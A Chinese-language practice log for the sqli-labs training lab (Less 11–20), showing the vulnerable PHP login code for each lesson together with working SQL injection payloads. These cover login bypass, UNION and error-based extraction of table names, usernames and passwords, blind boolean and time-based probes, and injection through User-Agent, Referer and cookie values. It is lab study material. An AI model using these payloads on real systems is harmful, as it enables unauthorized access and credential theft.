SQLI-LAB 的 实战记录(Less 11 - Less 20)
以下内容 只是本人在做 sqli-lab 练习时 写下的记录,仅供参考。 因为本人学过一些 sql注入 的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 11 Error Based- String
(第11课:基于错误 - 字符型)
Test:
http://localhost/sqli-lab/Less-11/index.php
uname=' &passwd=' &submit=Submit
注:这个是报错的。 建议用火狐浏览器的HackBar或者Burp来做测试 POST 格式 是用 Burp 截的,其实变量名可以直接右键看网页的源代码。 听说过万能密码么?可以考虑使用
Sourse Code:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname= ' or '1'='1 &passwd= ' or '1'='1 &submit=Submit
uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit
uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit
其它:
uname= ' union select database(),6 --+ &passwd= ' union select database(),6 --+ &submit=Submit
uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= ' --+ &submit=Submit
uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= ' --+ &submit=Submit
Less - 12 Error Based- Double quotes- String
(第12课:基于错误 - 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-12/index.php
uname= ") &passwd= " &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=(" " ") LIMIT 0,1' at line 1
注:直接就指出了 $uname
和$passwd
周围是双引号和一层括号
Sourse Code:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit
uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit
其它:
uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit
uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit
uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit
Less - 13 Double Injection- String- with twist
(第13课:双注入 - 字符型 - 变形)
Test:
http://localhost/sqli-lab/Less-13/index.php
uname= 0' &passwd= 0' &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' ') LIMIT 0,1' at line 1
注:直接就指出了 $uname
和$passwd
周围是单引号和一层括号
Sourse Code:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit
uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit
其它:
uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
Less - 14 Double Injection- Double quotes- String
(第14课:双注入 - 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-14/index.php
uname= "&passwd=' &submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' " LIMIT 0,1' at line 1
注:能看出 $uname
和$passwd
周围只有双引号
Sourse Code:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit
uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit
uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit
其它:
uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit
Less - 15 Blind- Boolian Based- String
(第15课:盲注 - 基于布尔值 - 字符串)
Test:
http://localhost/sqli-lab/Less-15/index.php
uname=" or 1=1 # &passwd=" or 1=1 # &submit=Submit
uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit
注:第一个错了,第二个对了,被单引号包围,没有回显,考虑盲注。
Sourse Code:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg" />';
}else{
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit
uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit
其它:
uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit
uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit
Less - 16 Blind- Time Based- Double quotes- String
(第16课:盲注 - 基于时间 - 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-16/index.php
uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit
uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit
注:第一个错了,第二个对了,被双引号包围,没有回显,考虑盲注。 它的回显图片暴露了对错,所以是基于布尔值或是基于时间都行。
Sourse Code:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg" />';
}else{
echo '<img src="../images/slap.jpg" />';
}
Solution:
uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit
uname=") or 1=1 or if(1=1, sleep(1), null) #&passwd=") or 1=1 #&submit=Submit
其它:
uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit
uname=") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #&passwd=") or 1=1 #&submit=Submit
Less - 17 Update Query- Error based - String
(第17课:更新查询 - 基于错误 - 字符串)
Test:
http://localhost/sqli-lab/Less-17/index.php
注:标题是密码重置,输入框就一个用户名,一个新密码,猜对用户名就好
Sourse Code:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error()){
print_r(mysql_error());
}else{
}
echo '<img src="../images/flag1.jpg" />';
}else{
echo '<img src="../images/slap1.jpg" />';
}
注:对 $uname
和$passwd
字段有检查
Solution:
uname=admin&passwd=666&submit=Submit
其它:
uname=Dumb&passwd=666&submit=Submit
uname=Angelina&passwd=666&submit=Submit
uname=secure&passwd=666&submit=Submit
Less - 18 Header Injection- Error Based- string
(第18课: 头部注入 - 基于错误 - 字符串)
Test:
http://localhost/sqli-lab/Less-18/index.php
uname=admin&passwd=admin&submit=Submit
Your IP ADDRESS is: 127.0.0.1 Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 注:建议使用火狐的Modify Headers 或 Burp 修改 user-agent的值 已经将上一次练习中动过的 数据库的值改回来了。
Sourse Code:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
echo 'Your User Agent is: ' .$uagent;
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
注:对 $uname
和$passwd
字段有检查
Solution:
' or '1' = '1
其它:
' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1
注:以上是user agent 的值,基于时间的盲注,如果不对会延时5s
Less - 19 Header Injection- Referer- Error Based- string
(第19课:头部注入 - Referer字段 - 基于错误- 字符串 )
Test:
http://localhost/sqli-lab/Less-19/index.php
uname=admin&passwd=admin&submit=Submit
Your IP ADDRESS is: 127.0.0.1 Your Referer is: 注:建议使用火狐的Modify Headers 或 Burp 修改 referer的值
Sourse Code:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
注:对 $uname
和$passwd
字段有检查
Solution:
' or '1' = '1
其它:
' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1
注:以上是referer 的值,基于时间的盲注,如果不对,会延时5s
Less - 20 POST - Cookie injections - Uagent field - error based
(第20课:POST – cookie 注入 - Uagent字段 - 基于错误)
Test:
http://localhost/sqli-lab/Less-20/index.php
uname=Dumb&passwd=Dumb&submit=Submit
注:先登录,比如你知道一个账号 uname:Dumb,pwd:Dumb
登录以后会显示用户名 密码 Id cookie IP地址 User Agent。
可以使用火狐浏览器的Firebug来修改cookie中$uname
的值。
记得把过期时间也改了,不然刚改完$uname
的值,cookie就过期了。。。
Sourse Code:
无cookie时 登录部分
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1){
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
有cookie时 登录部分
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result){
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
}else{
echo '<img src="../images/slap1.jpg" />';
}
注:对 $uname
和$passwd
字段有检查,有cookie时 从数据库中显示的数据是 username、password和id
Solution:
Dumb ' or 1=1 #
其它:
' union select 1,database(),6 or 1=1 #
' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
' union select 1,group_concat(username),group_concat(password) from security.users #
注:以上是cookie中uname的值